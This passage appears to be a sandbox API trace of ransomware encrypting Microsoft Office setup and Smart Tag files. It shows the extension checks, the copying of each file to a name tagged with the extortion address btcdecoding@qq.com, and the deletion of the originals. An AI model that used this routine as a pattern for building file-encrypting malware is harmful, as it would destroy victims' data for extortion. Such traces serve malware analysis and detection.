lpOverlapped=0x0) returned 1 [0040.421] ReadFile (in: hFile=0x204, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.421] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.421] SetEndOfFile (hFile=0x208) returned 1 [0040.421] CloseHandle (hObject=0x208) returned 1 [0040.422] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.422] SetEndOfFile (hFile=0x204) returned 1 [0040.423] CloseHandle (hObject=0x204) returned 1 [0040.423] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.423] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml")) returned 1 [0040.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.423] lstrlenW (lpString=".doc") returned 4 [0040.423] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.423] lstrlenW (lpString=".docx") returned 5 [0040.423] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.423] lstrlenW (lpString=".pdf") returned 4 [0040.423] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.423] lstrlenW (lpString=".xls") returned 4 [0040.423] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.423] lstrlenW (lpString=".xlsx") returned 5 [0040.423] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.423] lstrlenW (lpString=".ppt") returned 4 [0040.423] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.423] lstrlenW (lpString=".zip") returned 4 [0040.423] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.423] lstrlenW (lpString=".rar") returned 4 [0040.423] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.424] lstrlenW (lpString=".bz2") returned 4 [0040.424] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.424] lstrlenW (lpString=".7z") returned 3 [0040.424] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.424] lstrlenW (lpString=".dbf") returned 4 [0040.424] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.424] lstrlenW (lpString=".1cd") returned 4 [0040.424] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.424] lstrlenW (lpString=".jpg") returned 4 [0040.424] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.424] lstrlenW (lpString=".doc") returned 4 [0040.424] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.424] lstrlenW (lpString=".docx") returned 5 [0040.424] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.424] lstrlenW (lpString=".pdf") returned 4 [0040.424] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.424] lstrlenW (lpString=".xls") returned 4 [0040.424] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.424] lstrlenW (lpString=".xlsx") returned 5 [0040.424] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.424] lstrlenW (lpString=".ppt") returned 4 [0040.424] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.424] lstrlenW (lpString=".zip") returned 4 [0040.424] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.424] lstrlenW (lpString=".rar") returned 4 [0040.424] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.424] lstrlenW (lpString=".bz2") returned 4 [0040.424] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.425] lstrlenW (lpString=".7z") returned 3 [0040.425] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.425] lstrlenW (lpString=".dbf") returned 4 [0040.425] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.425] lstrlenW (lpString=".1cd") returned 4 [0040.425] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0040.425] lstrlenW (lpString=".jpg") returned 4 [0040.425] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.425] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.425] lstrlenW (lpString="SETUP.XML") returned 9 [0040.425] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.426] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=20577) returned 1 [0040.426] CloseHandle (hObject=0x204) returned 1 [0040.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml")) returned 0x20 [0040.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.426] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.426] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.426] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.426] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0040.426] GetLastError () returned 0x0 [0040.427] ReadFile (in: hFile=0x204, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x5061, lpOverlapped=0x0) returned 1 [0040.429] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x5070, lpOverlapped=0x0) returned 1 [0040.431] ReadFile (in: hFile=0x204, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.431] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.431] SetEndOfFile (hFile=0x208) returned 1 [0040.431] CloseHandle (hObject=0x208) returned 1 [0040.432] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.432] SetEndOfFile (hFile=0x204) returned 1 [0040.432] CloseHandle (hObject=0x204) returned 1 [0040.433] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.433] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml")) returned 1 [0040.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.433] lstrlenW (lpString=".doc") returned 4 [0040.433] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.433] lstrlenW (lpString=".docx") returned 5 [0040.433] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.433] lstrlenW (lpString=".pdf") returned 4 [0040.433] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.433] lstrlenW (lpString=".xls") returned 4 [0040.433] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.433] lstrlenW (lpString=".xlsx") returned 5 [0040.433] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.433] lstrlenW (lpString=".ppt") returned 4 [0040.433] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.433] lstrlenW (lpString=".zip") returned 4 [0040.433] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.433] lstrlenW (lpString=".rar") returned 4 [0040.433] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.434] lstrlenW (lpString=".bz2") returned 4 [0040.434] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.434] lstrlenW (lpString=".7z") returned 3 [0040.434] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.434] lstrlenW (lpString=".dbf") returned 4 [0040.434] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.434] lstrlenW (lpString=".1cd") returned 4 [0040.434] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.434] lstrlenW (lpString=".jpg") returned 4 [0040.434] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.434] lstrlenW (lpString=".doc") returned 4 [0040.434] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.434] lstrlenW (lpString=".docx") returned 5 [0040.434] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.434] lstrlenW (lpString=".pdf") returned 4 [0040.434] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.434] lstrlenW (lpString=".xls") returned 4 [0040.434] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.434] lstrlenW (lpString=".xlsx") returned 5 [0040.434] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.434] lstrlenW (lpString=".ppt") returned 4 [0040.434] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.434] lstrlenW (lpString=".zip") returned 4 [0040.434] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.434] lstrlenW (lpString=".rar") returned 4 [0040.434] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.434] lstrlenW (lpString=".bz2") returned 4 [0040.434] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.434] lstrlenW (lpString=".7z") returned 3 [0040.435] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.435] lstrlenW (lpString=".dbf") returned 4 [0040.435] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.435] lstrlenW (lpString=".1cd") returned 4 [0040.435] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.435] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0040.435] lstrlenW (lpString=".jpg") returned 4 [0040.435] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.435] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.435] lstrlenW (lpString="VisiorWW.XML") returned 12 [0040.435] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.435] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=8723) returned 1 [0040.435] CloseHandle (hObject=0x204) returned 1 [0040.435] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml")) returned 0x20 [0040.435] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0040.435] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0040.436] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.436] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.436] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.437] GetLastError () returned 0x0 [0040.437] ReadFile (in: hFile=0x204, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x2213, lpOverlapped=0x0) returned 1 [0040.439] WriteFile (in: hFile=0x19c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x2220, lpOverlapped=0x0) returned 1 [0040.440] ReadFile (in: hFile=0x204, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.440] WriteFile (in: hFile=0x19c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.440] SetEndOfFile (hFile=0x19c) returned 1 [0040.440] CloseHandle (hObject=0x19c) returned 1 [0040.440] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.441] SetEndOfFile (hFile=0x204) returned 1 [0040.441] CloseHandle (hObject=0x204) returned 1 [0040.441] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0040.442] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml")) returned 1 [0040.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.442] lstrlenW (lpString=".doc") returned 4 [0040.442] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.442] lstrlenW (lpString=".docx") returned 5 [0040.442] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.442] lstrlenW (lpString=".pdf") returned 4 [0040.442] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.442] lstrlenW (lpString=".xls") returned 4 [0040.442] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.442] lstrlenW (lpString=".xlsx") returned 5 [0040.442] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.442] lstrlenW (lpString=".ppt") returned 4 [0040.442] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.442] lstrlenW (lpString=".zip") returned 4 [0040.442] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.442] lstrlenW (lpString=".rar") returned 4 [0040.442] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.442] lstrlenW (lpString=".bz2") returned 4 [0040.442] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.442] lstrlenW (lpString=".7z") returned 3 [0040.442] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.771] lstrlenW (lpString=".dbf") returned 4 [0040.771] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.771] lstrlenW (lpString=".1cd") returned 4 [0040.771] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.771] lstrlenW (lpString=".jpg") returned 4 [0040.771] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.771] lstrlenW (lpString=".doc") returned 4 [0040.771] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.771] lstrlenW (lpString=".docx") returned 5 [0040.771] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.771] lstrlenW (lpString=".pdf") returned 4 [0040.771] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.771] lstrlenW (lpString=".xls") returned 4 [0040.771] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.771] lstrlenW (lpString=".xlsx") returned 5 [0040.771] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.771] lstrlenW (lpString=".ppt") returned 4 [0040.771] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.771] lstrlenW (lpString=".zip") returned 4 [0040.771] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.771] lstrlenW (lpString=".rar") returned 4 [0040.771] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.771] lstrlenW (lpString=".bz2") returned 4 [0040.771] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.771] lstrlenW (lpString=".7z") returned 3 [0040.772] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.772] lstrlenW (lpString=".dbf") returned 4 [0040.772] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.772] lstrlenW (lpString=".1cd") returned 4 [0040.772] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.772] lstrlenW (lpString=".jpg") returned 4 [0040.772] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.772] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0040.772] lstrlenW (lpString="TIME.XML") returned 8 [0040.772] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0041.256] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=8564) returned 1 [0041.264] CloseHandle (hObject=0x178) returned 1 [0041.291] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml")) returned 0x20 [0041.291] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0041.292] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.292] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft 